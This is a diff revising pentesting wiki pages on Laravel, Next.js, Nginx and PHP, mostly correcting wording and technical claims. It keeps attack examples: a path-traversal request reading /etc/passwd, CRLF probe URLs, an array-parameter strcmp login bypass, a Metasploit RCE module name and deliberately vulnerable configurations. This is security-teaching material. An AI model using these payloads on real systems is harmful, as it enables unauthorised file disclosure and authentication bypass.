+The private Go tool **nounours** pushes AES-CBC/GCM brute-force throughput to about 1.5 billion attempts per second, reducing full-dataset cracking to under two minutes.<sup>[[1]](#references)[[2]](#references)</sup>
 
 
 ## CVE-2024-52301 – HTTP argv/env override → auth bypass
@@ -180,7 +180,7 @@ The `lomkit/laravel-rest-api` package before **2.13.0** merges per-action rules 
 
 ### Debugging mode
 
-If Laravel is in **debugging mode** you will be able to access the **code** and **sensitive data**.\
+If Laravel is in **debug mode**, error pages may expose **source code**, configuration, and **sensitive data**.\
 For example `http://127.0.0.1:8000/profiles`:
 
 ![Laravel Tricks - Debugging mode: For example http://127.0.0.1:8000/profiles](<../../images/image (1046).png>)
@@ -227,9 +227,9 @@ for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https:/
 
 ### .env
 
-Laravel saves the APP it uses to encrypt the cookies and other credentials inside a file called `.env` that can be accessed using some path traversal under: `/../.env`
+Laravel deployments commonly store the `APP_KEY` used for encryption, along with other credentials, in `.env`. A path-traversal or file-disclosure vulnerability may expose it with a path such as `/../.env`.
 
-Laravel will also show this information inside the debug page (that appears when Laravel finds an error and it's activated).
+An enabled debug error page may also disclose environment values.
 
 Using the secret APP_KEY of Laravel you can decrypt and re-encrypt cookies:
 
@@ -303,14 +303,14 @@ encrypt(b'{"data":"a:6:{s:6:\"_token\";s:40:\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2Swe
 
 Vulnerable versions: 5.5.40 and 5.6.x through 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
 
-Here you can find information about the deserialization vulnerability here: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)<sup>[[5]](#references)</sup>
+Details of the deserialization vulnerability are available in the [WithSecure write-up](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/).<sup>[[5]](#references)</sup>
 
 You can test and exploit it using [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
 Or you can also exploit it with metasploit: `use unix/http/laravel_token_unserialize_exec`
 
 ### CVE-2021-3129
 
-Another deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
+This Ignition debug-mode deserialization-to-RCE chain is documented with exploit material in the Ambionics repository.<sup>[[14]](#references)</sup>
 
 
 
@@ -329,6 +329,6 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/
 - [11] [CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (laravel-auth0)](https://www.wiz.io/vulnerability-database/cve/cve-2025-47275)
 - [12] [CVE-2025-48490 – lomkit/laravel-rest-api validation override](https://advisories.gitlab.com/pkg/composer/lomkit/laravel-rest-api/CVE-2025-48490/)
 - [13] [Unsafe SQL functions in Laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
-- [14] [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
+- [14] [Ambionics Laravel exploits: CVE-2021-3129](https://github.com/ambionics/laravel-exploits)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/nextjs.md
+++ b/src/network-services-pentesting/pentesting-web/nextjs.md
@@ -1,4 +1,4 @@
-# NextJS
+# Next.js
 
 {{#include ../../banners/hacktricks-training.md}}
 
@@ -6,7 +6,7 @@
 
 ### Typical File Structure
 
-A standard Next.js project follows a specific file and directory structure that facilitates its features like routing, API endpoints, and static asset management. Here's a typical layout:
+A Next.js project commonly follows a file and directory structure that supports routing, request handlers, and static assets. The exact layout depends on whether it uses the App Router, Pages Router, or both. The following example uses the App Router:<sup>[[12]](#references)</sup>
 
 ```lua
 my-nextjs-app/
@@ -50,11 +50,11 @@ my-nextjs-app/
 - **app/layout.tsx:** Defines the root layout for your application, wrapping around all pages and providing consistent UI elements like headers, footers, and navigation bars.
 - **app/page.tsx:** Serves as the entry point for the root route `/`, rendering the home page.
 - **app/[route]/page.tsx:** Handles static and dynamic routes. Each folder within `app/` represents a route segment, and `page.tsx` within those folders corresponds to the route's component.
-- **app/api/:** Contains API routes, allowing you to create serverless functions that handle HTTP requests. These routes replace the traditional `pages/api` directory.
+- **app/api/:** Common location for App Router Route Handlers. These are the App Router equivalent of Pages Router API Routes; their deployment runtime depends on the hosting configuration.<sup>[[12]](#references)</sup>
 - **app/components/:** Houses reusable React components that can be utilized across different pages and layouts.
 - **app/styles/:** Contains global CSS files and CSS Modules for component-scoped styling.
 - **app/utils/:** Includes utility functions, helper modules, and other non-UI logic that can be shared across the application.
-- **.env.local:** Stores environment variables specific to the local development environment. These variables are **not** committed to version control.
+- **.env.local:** Stores local environment variables. The default template ignores `.env*` files, but verify repository ignore rules rather than assuming the file cannot be committed.<sup>[[14]](#references)</sup>
 - **next.config.js:** Customizes Next.js behavior, including webpack configurations, environment variables, and security settings.
 - **tsconfig.json:** Configures TypeScript settings for the project, enabling type checking and other TypeScript features.
 - **package.json:** Manages project dependencies, scripts, and metadata.
@@ -91,7 +91,7 @@ my-nextjs-app/
 **Implementation:**
 
 ```tsx
-tsxCopy code// app/page.tsx
+// app/page.tsx
 
 export default function HomePage() {
   return (
@@ -120,7 +120,7 @@ export default function HomePage() {
 **File Structure:**
 
 ```arduino
-arduinoCopy codemy-nextjs-app/
+my-nextjs-app/
 ├── app/
 │   ├── about/
 │   │   └── page.tsx
@@ -164,7 +164,7 @@ Dynamic routes allow handling paths with variable segments, enabling application
 **File Structure:**
 
 ```arduino
-arduinoCopy codemy-nextjs-app/
+my-nextjs-app/
 ├── app/
 │   ├── posts/
 │   │   └── [id]/
@@ -179,7 +179,7 @@ arduinoCopy codemy-nextjs-app/
 **Implementation:**
 
 ```tsx
-tsxCopy code// app/posts/[id]/page.tsx
+// app/posts/[id]/page.tsx
 
 import { useRouter } from 'next/navigation';
 
@@ -219,7 +219,7 @@ Next.js supports nested routing, allowing for hierarchical route structures that
 **File Structure:**
 
 ```arduino
-arduinoCopy codemy-nextjs-app/
+my-nextjs-app/
 ├── app/
 │   ├── dashboard/
 │   │   ├── settings/
@@ -236,7 +236,7 @@ arduinoCopy codemy-nextjs-app/
 **Implementation:**
 
 ```tsx
-tsxCopy code// app/dashboard/settings/profile/page.tsx
+// app/dashboard/settings/profile/page.tsx
 
 export default function ProfileSettingsPage() {
   return (
@@ -356,7 +356,7 @@ function RenderTemplate({ template, data }) {
 
 <summary>Client Path Traversal</summary>
 
-It's a vulnerability that allows attackers to manipulate client-side paths to perform unintended actions, such as Cross-Site Request Forgery (CSRF). Unlike server-side path traversal, which targets the server's filesystem, CSPT focuses on exploiting client-side mechanisms to reroute legitimate API requests to malicious endpoints.
+Client-side path traversal (CSPT) occurs when attacker-controlled input is interpolated into a client-generated request path. Dot segments can redirect an otherwise legitimate, credentialed request to a different application endpoint. When that endpoint changes state, CSPT can provide a CSRF-like primitive; unlike server-side filesystem traversal, the manipulated path is an HTTP route.
 
 **Example of Vulnerable Code:**
 
@@ -433,7 +433,7 @@ curl -s "http://target/_next/static/${build}/_buildManifest.js" | grep -oE '"(/[
 
 ### Server-Side Rendering (SSR)
 
-Pages are rendered on the server on each request, ensuring that the user receives fully rendered HTML. In this case you should create your own custom server to process the requests.
+With request-time server-side rendering, a page is rendered on the server for each request and returned as HTML. The built-in Next.js server supports this model; a custom server is only needed for requirements the built-in server cannot meet.
 
 **Use Cases:**
 
@@ -485,7 +485,7 @@ export default HomePage
 
 ### Serverless Functions (API Routes)
 
-Next.js allows the creation of API endpoints as serverless functions. These functions run on-demand without the need for a dedicated server.
+Next.js supports API endpoints through App Router Route Handlers and Pages Router API Routes. Platforms may deploy them as serverless functions, but they can also run in a persistent Node.js server.<sup>[[12]](#references)</sup>
 
 **Use Cases:**
 
@@ -653,7 +653,7 @@ Before Next.js 13 introduced the `app` directory and enhanced routing capabiliti
 **File Structure:**
 
 ```go
-goCopy codemy-nextjs-app/
+my-nextjs-app/
 ├── pages/
 │   └── api/
 │       └── hello.js
@@ -664,7 +664,7 @@ goCopy codemy-nextjs-app/
 **Implementation:**
 
 ```javascript
-javascriptCopy code// pages/api/hello.js
+// pages/api/hello.js
 
 export default function handler(req, res) {
   res.status(200).json({ message: 'Hello, World!' });
@@ -683,7 +683,7 @@ export default function handler(req, res) {
 **File Structure:**
 
 ```bash
-bashCopy codemy-nextjs-app/
+my-nextjs-app/
 ├── pages/
 │   └── api/
 │       └── users/
@@ -695,7 +695,7 @@ bashCopy codemy-nextjs-app/
 **Implementation:**
 
 ```javascript
-javascriptCopy code// pages/api/users/[id].js
+// pages/api/users/[id].js
 
 export default function handler(req, res) {
   const {
@@ -736,7 +736,7 @@ While the basic API route example handles all HTTP methods within a single funct
 **Example:**
 
 ```javascript
-javascriptCopy code// pages/api/posts.js
+// pages/api/posts.js
 
 export default async function handler(req, res) {
   const { method } = req;
@@ -785,7 +785,7 @@ export async function GET(request) {
 }
 ```
 
-Note that **CORS can also be configured in all the API routes** inside the **`middleware.ts`** file:
+CORS headers can also be applied centrally to matching API routes in **`middleware.ts`**:
 
 ```javascript
 // app/middleware.ts
@@ -834,12 +834,12 @@ export const config = {
 
 **Problem:**
 
-- **`Access-Control-Allow-Origin: '*'`:** Permits any website to access the API, potentially allowing malicious sites to interact with your API without restrictions.
-- **Wide Method Allowance:** Allowing all methods can enable attackers to perform unwanted actions.
+- **`Access-Control-Allow-Origin: '*'`:** Lets any origin read non-credentialed responses. This is appropriate for intentionally public data but dangerous when the response was expected to be origin-restricted.
+- **Wide method allowance:** Advertising methods that the application does not need expands the cross-origin interface. Actual impact still depends on preflight behavior, credential policy, and server-side authorization.
 
 **How attackers exploit it:**
 
-Attackers can craft malicious websites that make requests to your API, potentially abusing functionalities like data retrieval, data manipulation, or triggering unwanted actions on behalf of authenticated users.
+Attackers can craft websites that make cross-origin requests to the API. Whether they can read data or act with a victim's credentials depends on the complete CORS policy, cookie attributes, and endpoint authorization.
 
 {{#ref}}
 ../../pentesting-web/cors-bypass.md
@@ -847,7 +847,7 @@ Attackers can craft malicious websites that make requests to your API, potential
 
 ### Server code exposure in Client Side
 
-It's can easy to **use code used by the server also in code exposed and used by the client side**, the best way to ensure that a file of code is never exposed in the client side is by using this import at the beginning of the file:
+Modules can accidentally be shared between server and client components. Mark a module as server-only so that importing it into a client component produces a build-time error:<sup>[[13]](#references)</sup>
 
 ```js
 import "server-only"
@@ -974,7 +974,7 @@ module.exports = {
 
 <summary>Image Optimization Settings</summary>
 
-Next.js optimizes images for performance, but misconfigurations can lead to security vulnerabilities, such as allowing untrusted sources to inject malicious content.
+Next.js optimizes remote images, but overly broad source patterns can let attackers make the optimizer fetch URLs you did not intend. Prefer narrowly scoped `remotePatterns`.<sup>[[15]](#references)</sup>
 
 **Bad Configuration Example:**
 
@@ -983,19 +983,19 @@ Next.js optimizes images for performance, but misconfigurations can lead to secu
 
 module.exports = {
   images: {
-    domains: ["*"], // Allows images from any domain
+    remotePatterns: [{ hostname: "**" }], // Overly broad: any hostname/protocol/path
   },
 }
 ```
 
 **Problem:**
 
-- **`'*'`:** Permits images to be loaded from any external source, including untrusted or malicious domains. Attackers can host images containing malicious payloads or content that misleads users.
-- Another problem might be to allow a domain **where anyone can upload an image** (like `raw.githubusercontent.com`)
+- **`hostname: "**"` with omitted restrictions:** permits optimization from arbitrary external sources instead of constraining the protocol, host, path, and query string.
+- A similarly risky pattern allows a domain **where any user can upload content** (for example, `raw.githubusercontent.com`) without restricting the pathname.
 
 **How attackers abuse it:**
 
-By injecting images from malicious sources, attackers can perform phishing attacks, display misleading information, or exploit vulnerabilities in image rendering libraries.
+Depending on how the application accepts image URLs, attackers may consume optimizer bandwidth, make the server fetch unintended resources, or display misleading content. Treat the optimizer as a server-side fetch surface and test the exact allowed patterns.
 
 </details>
 
@@ -1014,15 +1014,15 @@ Manage sensitive information like API keys and database credentials securely wit
 
 module.exports = {
   env: {
-    SECRET_API_KEY: process.env.SECRET_API_KEY, // Not exposed to the client
-    NEXT_PUBLIC_API_URL: process.env.NEXT_PUBLIC_API_URL, // Correctly prefixed for exposure to client
+    SECRET_API_KEY: process.env.SECRET_API_KEY, // Exposed: next.config.js env values enter the JS bundle
+    NEXT_PUBLIC_API_URL: process.env.NEXT_PUBLIC_API_URL,
   },
 }
 ```
 
 **Problem:**
 
-- **`SECRET_API_KEY`:** Without the `NEXT_PUBLIC_` prefix, Next.js does not expose variables to the client. However, if mistakenly prefixed (e.g., `NEXT_PUBLIC_SECRET_API_KEY`), it becomes accessible on the client side.
+- **`SECRET_API_KEY`:** Values declared under the `env` key in `next.config.js` are always included in the JavaScript bundle, regardless of their name. For variables loaded normally from the process or `.env` files, `NEXT_PUBLIC_` is what opts a value into browser bundling.<sup>[[14]](#references)</sup>
 
 **How attackers abuse it:**
 
@@ -1041,18 +1041,12 @@ Manage URL redirections and rewrites within your application, ensuring that user
 **Bad Configuration Example:**
 
 ```javascript
-// next.config.js
+// app/redirect/route.js
+import { NextResponse } from "next/server"
 
-module.exports = {
-  async redirects() {
-    return [
-      {
-        source: "/redirect",
-        destination: (req) => req.query.url, // Dynamically redirects based on query parameter
-        permanent: false,
-      },
-    ]
-  },
+export function GET(request) {
+  const destination = request.nextUrl.searchParams.get("url")
+  return NextResponse.redirect(destination) // Vulnerable: no destination allowlist
 }
 ```
 
@@ -1208,7 +1202,7 @@ app.prepare().then(() => {
 
 ### Environment Variables and Configuration
 
-**Purpose:** Manage sensitive information and configuration settings outside of the codebase.
+**Purpose:** Manage sensitive information and configuration settings outside the codebase.
 
 **Best Practices:**
 
@@ -1219,16 +1213,15 @@ app.prepare().then(() => {
 **Example:**
 
 ```javascript
-// next.config.js
-module.exports = {
-  env: {
-    API_KEY: process.env.API_KEY, // Accessible on both client and server
-    SECRET_KEY: process.env.SECRET_KEY, // Be cautious if accessible on the client
-  },
+// Server-only module: lib/data.js
+import "server-only"
+
+export function getApiKey() {
+  return process.env.API_KEY
 }
 ```
 
-**Note:** To restrict variables to server-side only, omit them from the `env` object or prefix them with `NEXT_PUBLIC_` for client exposure.
+**Note:** Keep secrets out of the `env` object in `next.config.js`, do not give them a `NEXT_PUBLIC_` prefix, and access them only from server code. The `server-only` marker helps prevent accidental client imports.<sup>[[13]](#references)[[14]](#references)</sup>
 
 ### Useful server artifacts to target via LFI/download endpoints
 
@@ -1480,5 +1473,9 @@ python3 scanner.py -l hosts.txt -t 20 --waf-bypass -o vulnerable.json
 - [9] [Re:CACHE - Excessive Reflection, Type Confusion, and 0-Click SXSS on Next.js](https://zhero-web-sec.github.io/research-and-things/re-cache-excessive-reflection-type-confusion-and-0-click-sxss-on-nextjs)
 - [10] [MDN: Refresh header](https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Refresh)
 - [11] [Next.js proxy matcher docs](https://nextjs.org/docs/app/api-reference/file-conventions/proxy)
+- [12] [Next.js Route Handlers](https://nextjs.org/docs/app/getting-started/route-handlers)
+- [13] [Next.js Server and Client Components: preventing environment poisoning](https://nextjs.org/docs/app/getting-started/server-and-client-components#preventing-environment-poisoning)
+- [14] [Next.js environment variables and `next.config.js` `env`](https://nextjs.org/docs/pages/api-reference/config/next-config-js/env)
+- [15] [Next.js Image Component: remote patterns](https://nextjs.org/docs/app/api-reference/components/image#remotepatterns)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/nginx.md
+++ b/src/network-services-pentesting/pentesting-web/nginx.md
@@ -22,7 +22,7 @@ In this configuration, `/etc/nginx` is designated as the root directory. This se
 
 A critical security consideration arises from this configuration. A simple `GET` request, like `GET /nginx.conf`, could expose sensitive information by serving the Nginx configuration file located at `/etc/nginx/nginx.conf`. Setting the root to a less sensitive directory, like `/etc`, could mitigate this risk, yet it still may allow unintended access to other critical files, including other configuration files, access logs, and even encrypted credentials used for HTTP basic authentication.<sup>[[1]](#references)</sup>
 
-## Alias LFI Misconfiguration <a href="#alias-lfi-misconfiguration" id="alias-lfi-misconfiguration"></a>
+## Alias LFI misconfiguration <a href="#alias-lfi-misconfiguration" id="alias-lfi-misconfiguration"></a>
 
 In the configuration files of Nginx, a close inspection is warranted for the "location" directives. A vulnerability known as Local File Inclusion (LFI) can be inadvertently introduced through a configuration that resembles the following:
 
@@ -44,7 +44,7 @@ location /imgs/ {
 
 More info: [https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/)<sup>[[12]](#references)</sup>
 
-Accunetix tests:
+Acunetix tests:
 
 ```
 alias../ => HTTP status code 403
@@ -76,7 +76,7 @@ location = /admin/ {
 ## Unsafe variable use / HTTP Request Splitting <a href="#unsafe-variable-use" id="unsafe-variable-use"></a>
 
 > [!CAUTION]
-> Vulnerable variables `$uri` and `$document_ur`i and this can be fixed by replacing them with `$request_uri`.
+> Variables containing a normalized URI, such as `$uri` and `$document_uri`, become dangerous when inserted into response headers or reconstructed upstream requests. `$request_uri` preserves the original request URI, but it is not a universal drop-in fix: validate the destination context and reject CR/LF or ambiguous path encodings.
 >
 > A regex can also be vulnerable like:
 >
@@ -108,14 +108,14 @@ Detectify: clrf
 
 Learn more about the risks of CRLF injection and response splitting at [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/).<sup>[[13]](#references)</sup>
 
-Also this technique is [**explained in this talk**](https://www.youtube.com/watch?v=gWQyWdZbdoY&list=PL0xCSYnG_iTtJe2V6PQqamBF73n7-f1Nr&index=77) with some vulnerable examples and dectection mechanisms.<sup>[[14]](#references)</sup> For example, In order to detect this misconfiguration from a blackbox perspective you could these requests:
+This technique is also [**explained in this talk**](https://www.youtube.com/watch?v=gWQyWdZbdoY&list=PL0xCSYnG_iTtJe2V6PQqamBF73n7-f1Nr&index=77), with vulnerable examples and detection mechanisms.<sup>[[14]](#references)</sup> For example, to detect the misconfiguration from a black-box perspective, compare these requests:
 
 - `https://example.com/%20X` - Any HTTP code
 - `https://example.com/%20H` - 400 Bad Request
 
 If vulnerable, the first will return as "X" is any HTTP method and the second will return an error as H is not a valid method. So the server will receive something like: `GET / H HTTP/1.1` and this will trigger the error.
 
-Another detection examples would be:
+Other detection examples are:
 
 - `http://company.tld/%20HTTP/1.1%0D%0AXXXX:%20x` - Any HTTP code
 - `http://company.tld/%20HTTP/1.1%0D%0AHost:%20x` - 400 Bad Request
@@ -160,20 +160,20 @@ Scans for this misconfiguration across systems revealed multiple instances where
 
 ### Using try_files with $URI$ARGS variables
 
-Following Nginx misconfiguration can lead to an LFI vulnerability:
+The following Nginx misconfiguration can lead to LFI:
 ```
 location / {
 		try_files $uri$args $uri$args/ /index.html;
 }
 ```
-In our configuration we have directive `try_files` which is used to check for existence of files in specified order. Nginx will server the first one that it will find. The basic syntax of the `try_files` directive is as follows:
+The `try_files` directive checks for files in the specified order and serves the first match. Its basic syntax is:
 ```
 try_files file1 file2 ... fileN fallback;
 ```
 
 Nginx will check for the existence of each file in the specified order. If a file exists, it will be served immediately. If none of the specified files exist, the request will be passed to the fallback option, which can be another URI or a specific error page.
 
-However, when using `$uri$args` variables in this directive, the Nginx will try to look for a file that matches the request URI combined with any query string arguments. Therefor we can exploit this configuration:
+When `$uri$args` is used as a filesystem candidate, Nginx concatenates the normalized URI and raw query arguments into the path it tests. This unsafe mixing can make traversal content from the query string part of the filename. Consider this exploitable configuration:
 ```
 http {
 	server {
@@ -192,7 +192,7 @@ GET /?../../../../../../../../etc/passwd HTTP/1.1
 Host: example.com
 ```
 
-Using our payload we will escape the root directory (defined in Nginx configuration) and load the `/etc/passwd` file. In debug logs we can observe how the Nginx tries the files:
+The payload escapes the configured root directory and loads `/etc/passwd`. Debug logs show the paths Nginx tests:
 
 ```
 ...SNIP...
@@ -244,13 +244,13 @@ When a valid `GET` request is made, Nginx processes it normally, returning a sta
 
 By default, Nginx's **`merge_slashes` directive** is set to **`on`**, which compresses multiple forward slashes in a URL into a single slash. This feature, while streamlining URL processing, can inadvertently conceal vulnerabilities in applications behind Nginx, particularly those prone to local file inclusion (LFI) attacks. Security experts **Danny Robinson and Rotem Bar** have highlighted the potential risks associated with this default behavior, especially when Nginx acts as a reverse-proxy.<sup>[[16]](#references)</sup>
 
-To mitigate such risks, it is recommended to **turn the `merge_slashes` directive off** for applications susceptible to these vulnerabilities. This ensures that Nginx forwards requests to the application without altering the URL structure, thereby not masking any underlying security issues.
+Do not treat `merge_slashes off` as a security fix. Disabling normalization may be useful during testing or required by an application, but it can expose backend traversal behavior that the default setting happened to mask. Align proxy and backend canonicalization, reject ambiguous paths, and enforce authorization on the canonical route.<sup>[[16]](#references)</sup>
 
 For more information check [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d).<sup>[[16]](#references)</sup>
 
 ## `proxy_pass` path normalization & encoded slash confusion
 
-A less obvious but very common reverse-proxy bug appears when a **prefix location** is combined with a `proxy_pass` that also contains a **URI path**. According to the [official `proxy_pass` docs](https://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_pass), if a URI is present in `proxy_pass`, nginx forwards the **normalized** request URI to the backend. That means **percent-decoding** and **dot-segment normalization** happen before the upstream sees the path.<sup>[[7]](#references)[[21]](#references)</sup>
+A less obvious but very common reverse-proxy bug appears when a **prefix location** is combined with a `proxy_pass` that also contains a **URI path**. According to the [official `proxy_pass` docs](https://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_pass), if a URI is present in `proxy_pass`, nginx forwards the **normalized** request URI to the backend. That means **percent-decoding** and **dot-segment normalization** happen before the upstream sees the path.<sup>[[7]](#references)[[20]](#references)</sup>
 
 Example of risky configuration:
 
@@ -305,13 +305,13 @@ location /api/ {
 }
 ```
 
-If the path must be rewritten before proxying, preserve the **raw** request path with `$request_uri` before doing rewrites; otherwise the rewrite operates on nginx's normalized `$uri`.
+If the path must be rewritten before proxying, explicitly define which canonical form is authorized and forwarded. `$request_uri` preserves the original path and arguments, whereas rewrite processing uses normalized URI state; forwarding the raw value can itself be unsafe unless encoded separators and dot segments are rejected.
 
 ### **Malicious Response Headers**
 
-As shown in [**this writeup**](https://mizu.re/post/cors-playground), there are certain headers that if present in the response from the web server they will change the behaviour of the Nginx proxy.<sup>[[17]](#references)</sup> You can check them [**in the docs**](https://www.nginx.com/resources/wiki/start/topics/examples/x-accel/):<sup>[[22]](#references)</sup>
+As shown in [**this writeup**](https://mizu.re/post/cors-playground), certain upstream response headers change Nginx proxy behavior.<sup>[[17]](#references)</sup> They are listed in the [X-Accel documentation](https://www.nginx.com/resources/wiki/start/topics/examples/x-accel/).<sup>[[21]](#references)</sup>
 
-- `X-Accel-Redirect`: Indicate Nginx to internally redirect a request to a specified location.
+- `X-Accel-Redirect`: Instructs Nginx to internally redirect a request to a specified location.
 - `X-Accel-Buffering`: Controls whether Nginx should buffer the response or not.
 - `X-Accel-Charset`: Sets the character set for the response when using X-Accel-Redirect.
 - `X-Accel-Expires`: Sets the expiration time for the response when using X-Accel-Redirect.
@@ -361,7 +361,7 @@ The **`proxy_pass`** directive is utilized for redirecting requests to other ser
 If the nginx server is configured to pass the Upgrade and Connection headers an [**h2c Smuggling attack**](../../pentesting-web/h2c-smuggling.md) could be performed to access protected/internal endpoints.
 
 > [!CAUTION]
-> This vulnerability would allow an attacker to **stablish a direct connection with the `proxy_pass` endpoint** (`http://backend:9999` in this case) that whose content is not going to be checked by nginx.
+> This vulnerability can let an attacker **establish a tunnel to the `proxy_pass` endpoint** (`http://backend:9999` in this case), bypassing Nginx's normal per-request path checks.
 
 Example of vulnerable configuration to steal `/flag` from [here](https://bishopfox.com/blog/h2c-smuggling-request):<sup>[[18]](#references)</sup>
 
@@ -386,7 +386,7 @@ server {
 ```
 
 > [!WARNING]
-> Note that even if the `proxy_pass` was pointing to a specific **path** such as `http://backend:9999/socket.io` the connection will be stablished with `http://backend:9999` so you can **contact any other path inside that internal endpoint. So it doesn't matter if a path is specified in the URL of proxy_pass.**
+> Even if `proxy_pass` points to a specific **path**, such as `http://backend:9999/socket.io`, the upgraded connection is established with `http://backend:9999`. The tunneled protocol can therefore reach other paths on that internal endpoint; the path in `proxy_pass` does not constrain subsequent tunneled requests.
 
 ## HTTP/2 upstream request injection with `proxy_set_body`
 
@@ -579,8 +579,7 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne
 - [17] [CORS Playground](https://mizu.re/post/cors-playground)
 - [18] [Research on h2c Smuggling: Request Smuggling Via HTTP/2 Cleartext (h2c)](https://bishopfox.com/blog/h2c-smuggling-request)
 - [19] [nginx security advisory (CVE-2024-31079, CVE-2024-32760, CVE-2024-34161, CVE-2024-35200)](https://mailman.nginx.org/pipermail/nginx-announce/2024/GMY32CSHFH6VFTN76HJNX7WNEX4RLHF6.html)
-- [20] [https://mailman.nginx.org/pipermail/nginx-announce/2024/GWH2WZDVCOC2A5X67GKIMJM4YRELTR77.html](https://mailman.nginx.org/pipermail/nginx-announce/2024/GWH2WZDVCOC2A5X67GKIMJM4YRELTR77.html)
-- [21] [nginx.org - Ngx Http Proxy Module: Proxy Pass](https://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_pass)
-- [22] [nginx.com - in the docs](https://www.nginx.com/resources/wiki/start/topics/examples/x-accel)
+- [20] [nginx.org - Ngx Http Proxy Module: Proxy Pass](https://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_pass)
+- [21] [nginx.com - X-Accel response headers](https://www.nginx.com/resources/wiki/start/topics/examples/x-accel)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
@@ -2,7 +2,7 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Cookies common location:
+## Common cookie-session locations
 
 This is also valid for phpMyAdmin cookies.
 
@@ -26,7 +26,7 @@ Example: ../../../../../../tmp/sess_d1d531db62523df80e1153ada1d4b02e
 
 ### Loose comparisons/Type Juggling ( == )
 
-If `==` is used in PHP, then there are unexpected cases where the comparison doesn't behave as expected. This is because "==" only compare values transformed to the same type, if you also want to compare that the type of the compared data is the same you need to use `===`.
+PHP's `==` operator performs type coercion and can produce surprising results. Use `===` when both value and type must match. Exact loose-comparison behavior is version-dependent: PHP 8 changed number-to-non-numeric-string comparisons, so many classic PHP 7 examples no longer evaluate to `true`.<sup>[[16]](#references)</sup>
 
 PHP comparison tables: [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)
 
@@ -36,18 +36,18 @@ PHP comparison tables: [https://www.php.net/manual/en/types.comparisons.php](htt
 EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf
 {{#endfile}}
 
-- `"string" == 0 -> True` A string which doesn't start with a number is equals to a number
-- `"0xAAAA" == "43690" -> True` Strings composed by numbers in dec or hex format can be compare to other numbers/strings with True as result if the numbers were the same (numbers in a string are interpreted as numbers)
-- `"0e3264578" == 0 --> True` A string starting with "0e" and followed by anything will be equals to 0
-- `"0X3264578" == 0X --> True` A string starting with "0" and followed by any letter (X can be any letter) and followed by anything will be equals to 0
-- `"0e12334" == "0" --> True` This is very interesting because in some cases you can control the string input of "0" and some content that is being hashed and compared to it. Therefore, if you can provide a value that will create a hash starting with "0e" and without any letter, you could bypass the comparison. You can find **already hashed strings** with this format here: [https://github.com/spaze/hashes](https://github.com/spaze/hashes)
-- `"X" == 0 --> True` Any letter in a string is equals to int 0
+Classic cases to test include:
+
+- `"string" == 0` is `true` through PHP 7 but `false` in PHP 8 because the string is non-numeric.<sup>[[16]](#references)</sup>
+- Numeric strings can be converted for numeric comparison. Hex-string handling changed across older PHP releases, so verify examples such as `"0xAAAA" == "43690"` against the target version.
+- Strings matching numeric scientific notation, such as `"0e3264578"`, are numeric zero. A hash consisting of `0e` followed only by digits can therefore compare equal to another numeric-zero string under `==`. Precomputed examples are available at [spaze/hashes](https://github.com/spaze/hashes).
+- Other classic non-numeric-string-to-zero cases, such as `"X" == 0`, apply to PHP 7 and earlier, not PHP 8.<sup>[[16]](#references)</sup>
 
 More info in [https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09](https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09)<sup>[[1]](#references)</sup>
 
 ### **in_array()**
 
-**Type Juggling** also affects to the `in_array()` function by default (you need to set to true the third argument to make an strict comparison):
+**Type juggling** also affects `in_array()` by default. Set the third argument to `true` to require strict comparison. As with `==`, the exact result of mixed string/number cases depends on the PHP version:
 
 ```php
 $values = array("apple","orange","pear","grape");
@@ -59,7 +59,7 @@ var_dump(in_array(0, $values, true));
 
 ### strcmp()/strcasecmp()
 
-If this function is used for **any authentication check** (like checking the password) and the user controls one side of the comparison, he can send an empty array instead of a string as the value of the password (`https://example.com/login.php/?username=admin&password[]=`) and bypass this check:
+On older PHP versions, code that used `strcmp()` or `strcasecmp()` for authentication and failed to validate input types could sometimes be bypassed by submitting an array (`password[]=`): the function emitted a warning and returned `null`, which loose surrounding logic could mistake for equality. Modern PHP enforces the string parameters and throws `TypeError`, so test this as a legacy behavior and examine how the application handles the exception.<sup>[[17]](#references)</sup>
 
 ```php
 if (!strcmp("real_pwd","real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
@@ -68,7 +68,7 @@ if (!strcmp(array(),"real_pwd")) { echo "Real Password"; } else { echo "No Real 
 // Real Password
 ```
